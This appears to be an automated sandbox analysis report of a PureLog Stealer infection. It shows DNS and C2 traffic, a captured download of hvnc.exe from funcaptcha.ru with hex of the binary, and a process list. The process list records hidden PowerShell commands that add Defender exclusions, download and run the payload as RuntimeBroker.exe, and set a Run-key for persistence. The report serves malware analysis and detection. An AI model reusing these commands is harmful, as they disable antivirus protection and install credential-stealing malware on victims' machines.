                        Aug 6, 2024 18:12:37.921113014 CEST560014971245.11.229.96192.168.2.5
                        Aug 6, 2024 18:12:59.281466007 CEST560014971245.11.229.96192.168.2.5
                        Aug 6, 2024 18:12:59.281755924 CEST4971256001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:00.790843010 CEST4971256001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:00.791763067 CEST4971456001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:00.795839071 CEST560014971245.11.229.96192.168.2.5
                        Aug 6, 2024 18:13:00.796595097 CEST560014971445.11.229.96192.168.2.5
                        Aug 6, 2024 18:13:00.796670914 CEST4971456001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:00.796731949 CEST4971456001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:00.801636934 CEST560014971445.11.229.96192.168.2.5
                        Aug 6, 2024 18:13:00.801726103 CEST4971456001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:00.808163881 CEST560014971445.11.229.96192.168.2.5
                        Aug 6, 2024 18:13:22.196912050 CEST560014971445.11.229.96192.168.2.5
                        Aug 6, 2024 18:13:22.196985960 CEST4971456001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:23.712608099 CEST4971456001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:23.713640928 CEST4971556001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:23.840663910 CEST560014971445.11.229.96192.168.2.5
                        Aug 6, 2024 18:13:23.840723991 CEST560014971545.11.229.96192.168.2.5
                        Aug 6, 2024 18:13:23.840848923 CEST4971556001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:23.841659069 CEST4971556001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:23.847712994 CEST560014971545.11.229.96192.168.2.5
                        Aug 6, 2024 18:13:23.847784042 CEST4971556001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:23.853234053 CEST560014971545.11.229.96192.168.2.5
                        Aug 6, 2024 18:13:45.234520912 CEST560014971545.11.229.96192.168.2.5
                        Aug 6, 2024 18:13:45.234606981 CEST4971556001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:46.743974924 CEST4971556001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:46.744910002 CEST4971656001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:46.749059916 CEST560014971545.11.229.96192.168.2.5
                        Aug 6, 2024 18:13:46.750310898 CEST560014971645.11.229.96192.168.2.5
                        Aug 6, 2024 18:13:46.750380993 CEST4971656001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:46.750430107 CEST4971656001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:46.755719900 CEST560014971645.11.229.96192.168.2.5
                        Aug 6, 2024 18:13:46.755779982 CEST4971656001192.168.2.545.11.229.96
                        Aug 6, 2024 18:13:46.760905981 CEST560014971645.11.229.96192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 6, 2024 18:12:10.306605101 CEST | 62791 | 53 | 192.168.2.5 | 1.1.1.1
Aug 6, 2024 18:12:10.895558119 CEST | 53 | 62791 | 1.1.1.1 | 192.168.2.5
Aug 6, 2024 18:12:14.848717928 CEST | 58514 | 53 | 192.168.2.5 | 1.1.1.1
Aug 6, 2024 18:12:14.979787111 CEST | 53 | 58514 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 6, 2024 18:12:10.306605101 CEST | 192.168.2.5 | 1.1.1.1 | 0xdbae | Standard query (0) | funcaptcha.ru | A (IP address) | IN (0x0001) | false
Aug 6, 2024 18:12:14.848717928 CEST | 192.168.2.5 | 1.1.1.1 | 0x7a00 | Standard query (0) | strompreis.ru | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 6, 2024 18:12:10.895558119 CEST | 1.1.1.1 | 192.168.2.5 | 0xdbae | No error (0) | funcaptcha.ru | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Aug 6, 2024 18:12:10.895558119 CEST | 1.1.1.1 | 192.168.2.5 | 0xdbae | No error (0) | funcaptcha.ru | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Aug 6, 2024 18:12:14.979787111 CEST | 1.1.1.1 | 192.168.2.5 | 0x7a00 | No error (0) | strompreis.ru | | 45.11.229.96 | A (IP address) | IN (0x0001) | false

• funcaptcha.ru

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 188.114.96.3 | 443 | 2284 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-06 16:12:11 UTC | 71 | OUT | GET /hvnc.exe HTTP/1.1
Host: funcaptcha.ru
Connection: Keep-Alive
2024-08-06 16:12:11 UTC | 758 | IN | HTTP/1.1 200 OK
Date: Tue, 06 Aug 2024 16:12:11 GMT
Content-Type: application/x-msdos-program
Content-Length: 449024
Connection: close
Cache-Control: max-age=14400
content-disposition: inline; filename=hvnc.exe
etag: "1712326391.8143692-449024-1471809545"
last-modified: Fri, 05 Apr 2024 14:13:11 GMT
CF-Cache-Status: MISS
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R2uVCVEk6nXWiAaNCX5P%2BUnrLVn%2FCheWfnJwamKlJ0nW0xq9xYgkrWcYaeV8dn5IiBXG4V%2FzSNDp7LfFnn7TNCB8emSk9H7H9fl0yCH0CI3%2B2SrksR9eaEjiXerX7CY3"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8af04e9bad1c2363-EWR
alt-svc: h3=":443"; ma=86400
2024-08-06 16:12:11 UTC | 611 | IN | Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ac a2 de e4 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 d0 06 00 00 08 00 00 00 00 00 00 f2 2b 00 00 00 20 00 00 00 00 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0+ @ @@
2024-08-06 16:12:11 UTC | 1369 | IN | Data Raw: 11 00 00 0a 2a 13 30 03 00 37 00 00 00 01 00 00 11 28 02 00 00 06 74 18 00 00 01 72 01 00 00 70 6f 12 00 00 0a 0a d0 19 00 00 01 28 13 00 00 0a 06 72 4d 00 00 70 28 14 00 00 0a 16 8d 10 00 00 01 6f 15 00 00 0a 26 2a 00 1b 30 04 00 7c 00 00 00 02 00 00 11 73 16 00 00 0a 0a 28 05 00 00 06 73 17 00 00 0a 0b 7e 01 00 00 04 8d 1c 00 00 01 0c 07 08 16 7e 01 00 00 04 6f 18 00 00 0a 26 08 16 28 19 00 00 0a 26 07 16 73 1a 00 00 0a 0d 09 06 6f 1b 00 00 0a 06 6f 1c 00 00 0a 13 04 11 04 16 11 04 8e 69 28 1d 00 00 0a 11 04 13 05 de 1e 09 2c 06 09 6f 1e 00 00 0a dc 07 2c 06 07 6f 1e 00 00 0a dc 06 2c 06 06 6f 1e 00 00 0a dc 11 05 2a 01 28 00 00 02 00 3a 00 21 5b 00 0a 00 00 00 00 02 00 11 00 54 65 00 0a 00 00 00 00 02 00 06 00 69 6f 00 0a 00 00 00 00 5a 20 1f c2 06 00
Data Ascii: *07(trpo(rMp(o&*0|s(s~~o&(&sooi(,o,o,o*(:![TeioZ
2024-08-06 16:12:11 UTC | 1369 | IN | Data Raw: 30 37 33 46 37 36 35 33 31 46 38 43 44 30 35 44 46 41 00 53 79 73 74 65 6d 2e 49 4f 00 6d 73 63 6f 72 6c 69 62 00 52 65 61 64 00 54 68 72 65 61 64 00 4c 6f 61 64 00 43 6f 6d 70 72 65 73 73 69 6f 6e 4d 6f 64 65 00 44 79 6e 61 6d 69 63 49 6e 76 6f 6b 65 00 49 44 69 73 70 6f 73 61 62 6c 65 00 52 75 6e 74 69 6d 65 46 69 65 6c 64 48 61 6e 64 6c 65 00 52 75 6e 74 69 6d 65 54 79 70 65 48 61 6e 64 6c 65 00 47 65 74 54 79 70 65 46 72 6f 6d 48 61 6e 64 6c 65 00 56 61 6c 75 65 54 79 70 65 00 47 65 74 54 79 70 65 00 44 69 73 70 6f 73 65 00 52 65 76 65 72 73 65 00 43 72 65 61 74 65 44 65 6c 65 67 61 74 65 00 43 6f 6d 70 69 6c 65 72 47 65 6e 65 72 61 74 65 64 41 74 74 72 69 62 75 74 65 00 47 75 69 64 41 74 74 72 69 62 75 74 65 00 44 65 62 75 67 67 61 62 6c 65 41 74 74
Data Ascii: 073F76531F8CD05DFASystem.IOmscorlibReadThreadLoadCompressionModeDynamicInvokeIDisposableRuntimeFieldHandleRuntimeTypeHandleGetTypeFromHandleValueTypeGetTypeDisposeReverseCreateDelegateCompilerGeneratedAttributeGuidAttributeDebuggableAtt
2024-08-06 16:12:11 UTC | 1369 | IN | Data Raw: 62 38 37 65 2d 32 61 66 39 36 37 61 30 64 65 38 32 00 00 0c 01 00 07 31 2e 30 2e 30 2e 30 00 00 47 01 00 1a 2e 4e 45 54 46 72 61 6d 65 77 6f 72 6b 2c 56 65 72 73 69 6f 6e 3d 76 34 2e 30 01 00 54 0e 14 46 72 61 6d 65 77 6f 72 6b 44 69 73 70 6c 61 79 4e 61 6d 65 10 2e 4e 45 54 20 46 72 61 6d 65 77 6f 72 6b 20 34 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2b 00 00 00 00 00 00 00 00 00 00 e2 2b 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 2b 00 00 00 00 00 00 00 00 00 00 00 00 5f 43 6f 72 45 78 65 4d 61 69 6e 00 6d 73 63 6f 72 65 65 2e 64 6c 6c 00 00 00 00 00 ff 25 00 20 40 00 00 5a 0d 00 1f 8b 08 00 00 00 00 00 04 00 ec b7 73 70 67 5d d7 36 f8 8b d3 b1 6d 3b
Data Ascii: b87e-2af967a0de821.0.0.0G.NETFramework,Version=v4.0TFrameworkDisplayName.NET Framework 4++ +_CorExeMainmscoree.dll% @Zspg]6m;
2024-08-06 16:12:11 UTC | 1369 | IN | Data Raw: eb 0b bc f0 d0 29 09 ed 9d 09 83 c6 b9 eb a0 ba 71 f8 b9 e1 ad 5b 98 ed cc ec 29 65 30 48 b6 19 fd fa 49 a0 75 37 fa 04 58 c9 2b a3 8b bd a5 e3 d2 e4 b1 c6 54 a6 38 45 94 8c ba 93 11 91 28 6b 73 45 3c 39 55 f2 09 fd bd d0 09 a2 12 78 00 f5 9e 79 0a d7 5e 29 89 2b 61 79 3e 24 23 4d bd f0 d3 e1 a6 82 d1 4e 3e 8f 8a 79 32 cb 6d 6f 24 f5 95 ba 40 0d 06 59 22 05 fe 67 57 7a e1 87 d7 4a f6 f1 84 73 f8 73 f6 69 f3 cf 31 94 f2 c1 d1 db be 18 07 85 04 40 28 3d 50 96 80 58 f5 e2 1b 35 2a 25 61 29 eb b8 6b 9b 9d 41 7b e5 c4 85 fb 61 0f ea 75 db 91 2d 36 cb 6f df d9 16 43 97 c5 cf 4d b4 8d e6 ad d8 3e fc 4e 29 2c ce 86 fc 87 11 35 a8 9c fd e3 98 88 58 ba 23 56 a8 c9 cf 34 79 2f ed 80 ab 1d 98 14 28 3f 2d fe 57 b8 00 a5 c5 1c 2f 9e f4 18 4f 5a 10 2c a9 f6 92 1f 12 6a
Data Ascii: )q[)e0HIu7X+T8E(ksE<9Uxy^)+ay>$#MN>y2mo$@Y"gWzJssi1@(=PX5*%a)kA{au-6oCM>N),5X#V4y/(?-W/OZ,j
2024-08-06 16:12:11 UTC | 1369 | IN | Data Raw: ab f9 56 f0 0d 2b 99 a4 f3 b3 38 a4 f3 a7 70 66 1e 56 9d a1 b4 25 7b 69 bb 48 6d 8a 42 c4 dc b1 94 e1 5c 13 e9 2b 81 56 7c ce b9 a5 64 df ea 1b 9f 89 27 1b f0 1c 8c 08 60 4f be 18 1f f5 db 53 c1 ce 53 ec e0 50 4d 36 f0 ba f6 03 4b 77 c4 b0 ae 01 f1 aa 63 cd 5c 3c 81 93 7f 0d 5c b1 86 fd 6d 6a ec 05 4f 62 ba e4 01 ad d3 d0 8a 17 8d 28 3c 78 54 5c da 37 4b 2d fe b2 07 9d 88 8d 62 ed b1 17 f2 75 22 ae af 97 03 eb ef 21 b7 d5 63 b2 d0 4f 0d cd 63 8b 3b fb 10 e4 09 c8 08 18 b5 2d 7b 38 7b 66 27 f7 0b da 11 3a 55 9b 83 40 41 1b b0 2c 13 c8 08 fd 22 f4 d5 26 6e e4 0f 2d 86 f7 e3 2a 45 49 a7 56 3f f1 9f 34 0d e7 c2 eb 05 b6 9a 96 96 ca c0 b3 83 50 1f ec b9 28 7a 03 2c 25 bc 28 ac b3 69 35 1c 3f 7b 0a a8 fa f7 10 a5 43 2e 36 f2 5c e8 bd e6 39 d8 6a 89 46 87 eb 22
Data Ascii: V+8pfV%{iHmB\+V|d'`OSSPM6Kwc\<\mjOb(<xT\7K-bu"!cOc;-{8{f':U@A,"&n-*EIV?4P(z,%(i5?{C.6\9jF"
2024-08-06 16:12:11 UTC | 1369 | IN | Data Raw: f5 85 b3 2e 12 f6 be 37 73 db 6a 62 59 97 69 16 94 3f 0a b0 c5 dd 87 cc 41 3f 86 9a 1f 6f 8e a0 9c d2 92 cc 45 a7 c7 29 a4 67 0e 23 5f 66 41 19 a1 7d f8 b0 59 e1 6b 14 f1 a1 9e 53 75 54 66 9a 38 fe 20 3f 9d fa 50 d1 5b 8c 38 48 c8 38 55 2f 60 b9 a9 89 ef ea 6c 29 af 2d b6 7b 1b 9c f2 db 56 29 cc 92 29 40 ff b4 91 5c 06 eb 45 0a 9e 85 ef c5 45 ca 0a 9f 06 a0 4f 34 2f cb 94 1a d8 04 25 44 c4 94 57 f2 ae b1 9b e5 e4 7b 06 34 26 44 48 26 d5 d4 82 cb 6f 08 c4 5d 22 aa a7 b3 b3 67 e9 5e 7c 3e 50 5b 0a 37 41 a6 e5 49 d5 ce 71 fb 26 21 4e 9e 9d fd 93 fa 39 61 89 35 79 ba fe 8b 6b d4 86 1c 1c 65 e6 8d 28 05 cf 47 d7 70 0e 80 e2 ae 47 bc 34 03 1c da 8c 77 86 97 d9 fe 55 fb fa 44 fc 4a 3a 4a d1 6a da fd d3 34 cd 3d 1d 07 9c e0 6d 31 2b 8e f9 3b 73 33 33 9e ca b8 f3
Data Ascii: .7sjbYi?A?oE)g#_fA}YkSuTf8 ?P[8H8U/`l)-{V))@\EEO4/%DW{4&DH&o]"g^|>P[7AIq&!N9a5yke(GpG4wUDJ:Jj4=m1+;s33
2024-08-06 16:12:11 UTC | 1369 | IN | Data Raw: 89 ef 8c 30 fd 82 b6 e1 1c 3e 33 4a cc b5 58 b9 63 a7 95 fc e8 49 de 67 c8 01 9f 96 bc 56 ab 66 e3 78 c7 4a 5d b7 ba 6d 4f 6f 74 5d ad fd 8b f7 a3 2d 1c cf ca ab b1 23 2f eb e7 18 59 dd d1 66 6d fa 45 d3 e7 45 cf d6 76 85 c8 79 d0 71 25 eb 34 e1 57 6e 95 9c e3 f6 4f 84 ec 8e 1b e8 40 d2 4b dc 34 93 84 95 15 61 65 56 f3 e6 93 7e 98 1a dd 44 91 3f 98 93 ef af 91 fa 9f 74 4e 1c b9 78 70 fa c2 13 cc e7 40 88 de 47 f0 d0 6f bb eb 4f 9f 98 c4 4e 03 2d 88 07 44 98 bc 94 d5 fa 8c fa cd 1a 0e bb 4f 3e 25 d6 73 69 a4 04 90 d3 ca e2 ea de ac ec 88 08 b6 d5 0b e9 f5 3d 7a b0 05 c3 d3 82 60 54 49 c8 07 7f 1b c8 76 f7 c2 5e 3e 85 33 d3 19 8a bb 36 36 19 30 c5 eb ca 38 ac f8 ac da b2 a0 d1 54 ce e9 43 9e be c8 c4 d5 9d b9 f2 88 44 97 9a 61 2e 77 c7 d5 d4 f7 b4 95 cc 34
Data Ascii: 0>3JXcIgVfxJ]mOot]-#/YfmEEvyq%4WnO@K4aeV~D?tNxp@GoON-DO>%si=z`TIv^>36608TCDa.w4
2024-08-06 16:12:11 UTC | 1369 | IN | Data Raw: 05 8c 24 0a a9 52 51 5a 57 68 03 e3 6d cc 25 dc 33 9d 49 22 d3 81 82 49 1d 33 97 a7 d3 69 e9 1c c7 0d e5 69 66 b3 ba 97 c6 96 f2 d4 e1 8a d9 6f 37 f9 b6 fc 48 2a 22 9d 3f 3e d0 61 ed 15 96 c9 e0 e2 d5 a0 35 a1 4b 51 aa 66 70 5f 37 0b 8a e5 04 57 b2 14 b8 a2 83 90 6d 46 34 f0 ed 8f c2 a3 a7 31 2e 59 4a e6 5b 35 58 20 e4 40 0f 38 8d d0 af 21 0b 38 cf 43 17 07 0e 2d 7c 64 a2 47 01 78 62 07 99 43 cc 47 1d 35 56 20 d5 bd 2d 8a f6 58 32 6d bf e4 ec de 72 78 fb 56 19 08 bc 77 6b db 16 e8 6e b6 28 22 0b dc dd f2 6f 21 fd 14 45 3e 5d 84 1e e6 2b c7 7c 44 8d 2c 80 13 74 68 9b bb 7e 60 a1 00 73 68 ff f0 7d 25 83 0b cd ed 3c f4 71 73 63 a2 6c 73 b6 f2 57 81 2f 6c 26 bf 71 b7 a5 24 e5 4e 87 18 68 30 9f e1 1b f0 1f ec ea 7c 28 3e 3c fd fa 59 ac eb 90 a5 19 bb 62 2c 2f
Data Ascii: $RQZWhm%3I"I3iifo7H*"?>a5KQfp_7WmF41.YJ[5X @8!8C-|dGxbCG5V -X2mrxVwkn("o!E>]+|D,th~`sh}%<qsclsW/l&q$Nh0|(><Yb,/
2024-08-06 16:12:11 UTC | 1369 | IN | Data Raw: 1e 38 9a a0 bd 2e 60 93 59 d1 26 78 34 80 ff e8 57 db 54 5a 64 88 7b e9 a2 9b f3 9e 88 1c 7c 51 9d 22 10 0b 91 ad 1d fb 54 85 b7 ea f4 89 90 13 ad 97 6b 49 3b 76 10 b7 f6 f7 3d 3c 9b 4a 96 40 3c ad f9 68 6d b3 c5 bc 58 df 3d b3 c6 e9 93 99 d2 03 73 9d 90 13 a3 97 98 a9 a8 40 a3 2f db 65 a8 b7 12 22 23 2b 47 33 eb be 3b f3 b4 4c be 55 3a da 61 fa 04 a4 f0 2d c8 94 d5 32 3e a5 fc d6 21 02 4a d8 fa a4 33 49 ad 3b 78 b5 f0 b1 b8 77 63 5a 99 91 de 9e c3 50 a6 25 0d 42 a4 4c 8e 44 f1 76 40 bb 48 33 ee d7 0c f7 a1 64 f9 05 21 a6 6d 95 ad 9d 50 95 f0 bc b4 8b 7a 54 ef ae b6 f3 22 17 91 7f 73 01 26 3a 22 1c 09 96 80 92 73 d8 21 07 9a 9a c4 cd 41 fe b7 08 6b 73 8c 38 51 ef fc 42 11 d0 c7 dc 21 d3 06 17 6a 57 17 dd 75 e6 8c a0 72 96 6e 4c a1 26 e7 95 49 a2 ee 91 21
Data Ascii: 8.`Y&x4WTZd{|Q"TkI;v=<J@<hmX=s@/e"#+G3;LU:a-2>!J3I;xwcZP%BLDv@H3d!mPzT"s&:"s!Aks8QB!jWurnL&I!

                        Target ID:0
                        Start time:12:11:56
                        Start date:06/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\temp_script.bat" "
                        Imagebase:0x7ff62cd80000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:1
                        Start time:12:11:56
                        Start date:06/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:2
                        Start time:12:11:57
                        Start date:06/08/2024
                        Path:C:\Windows\System32\cacls.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
                        Imagebase:0x7ff709b70000
                        File size:34'304 bytes
                        MD5 hash:A353590E06C976809F14906746109758
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:4
                        Start time:12:11:57
                        Start date:06/08/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'"
                        Imagebase:0x7ff7be880000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:6
                        Start time:12:12:00
                        Start date:06/08/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.dll'"
                        Imagebase:0x7ff7be880000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:7
                        Start time:12:12:02
                        Start date:06/08/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'exe'"
                        Imagebase:0x7ff7be880000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:8
                        Start time:12:12:04
                        Start date:06/08/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'dll'"
                        Imagebase:0x7ff7be880000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:9
                        Start time:12:12:06
                        Start date:06/08/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:'"
                        Imagebase:0x7ff7be880000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:10
                        Start time:12:12:08
                        Start date:06/08/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')"
                        Imagebase:0x7ff7be880000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:11
                        Start time:12:12:11
                        Start date:06/08/2024
                        Path:C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe"
                        Imagebase:0x6a0000
                        File size:449'024 bytes
                        MD5 hash:7557AF6F3185128C25AEB092DC335975
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.3303350593.000000001C600000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                        Antivirus matches:
                        • Detection: 100%, Avira
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 66%, ReversingLabs
                        Reputation:low
                        Has exited:false

                        Target ID:12
                        Start time:12:12:11
                        Start date:06/08/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker' -Value '"C:\Users\user\AppData\Roaming\RuntimeBroker.exe"' -PropertyType 'String'
                        Imagebase:0x7ff7be880000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:13
                        Start time:12:12:11
                        Start date:06/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                          • Opcode ID: 1dce7d4d1eb695cba24817b98985f0e24cb90984306f217899f21b3ecd0d4757
                          • Instruction ID: 673c45feedd3ac9d99fa0f0ef1d0396b081ba2b6d8125a6f305d04ed00ea6bee
                          • Opcode Fuzzy Hash: 1dce7d4d1eb695cba24817b98985f0e24cb90984306f217899f21b3ecd0d4757
                          • Instruction Fuzzy Hash: 07E0C230B64A580B9B6CA66E5445471B3D5C79A206344427FA89BC32D5EC14FC864688
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3305523679.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848f10000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8e01b3a99c97260d0636551cf1b653ddf4cb342f0d7b54db29a357633dc145e1
                          • Instruction ID: b273dffd200615112b311d3e72647dfb31f690663a229474736f0450e640c182
                          • Opcode Fuzzy Hash: 8e01b3a99c97260d0636551cf1b653ddf4cb342f0d7b54db29a357633dc145e1
                          • Instruction Fuzzy Hash: 9CE09A3385D6999ED2263728A8020FA7B24FF91754F040277F84CC60C2DE082969829A
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3305523679.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848f10000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8cc7f120fc26390903c43874fb2e89e5ab27d0e137a5363dc5044acb9dab7efa
                          • Instruction ID: 48b785c936321de32d33e1ac253dc96431c4c09c7d48a57337621fa2b6f812f6
                          • Opcode Fuzzy Hash: 8cc7f120fc26390903c43874fb2e89e5ab27d0e137a5363dc5044acb9dab7efa
                          • Instruction Fuzzy Hash: 59F06D71E1C86A5EF6A0B328809937912C2EB887A0F540579D80DD33C3DF2CAC828749
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3305523679.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848f10000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 475ed9e24a1dd14f7d9f6e35bbce30a1db79d49a7a8c4ee1814d24d9e1eb22ed
                          • Instruction ID: 88a1b7c3d4d0c10f20dac81e4aaa626aae1753d668418bc4035b6442321a10de
                          • Opcode Fuzzy Hash: 475ed9e24a1dd14f7d9f6e35bbce30a1db79d49a7a8c4ee1814d24d9e1eb22ed
                          • Instruction Fuzzy Hash: 57E0E534A1991D4FDB88F76D845563526D2FB98350F800175D409C33C5DE1CD8518740
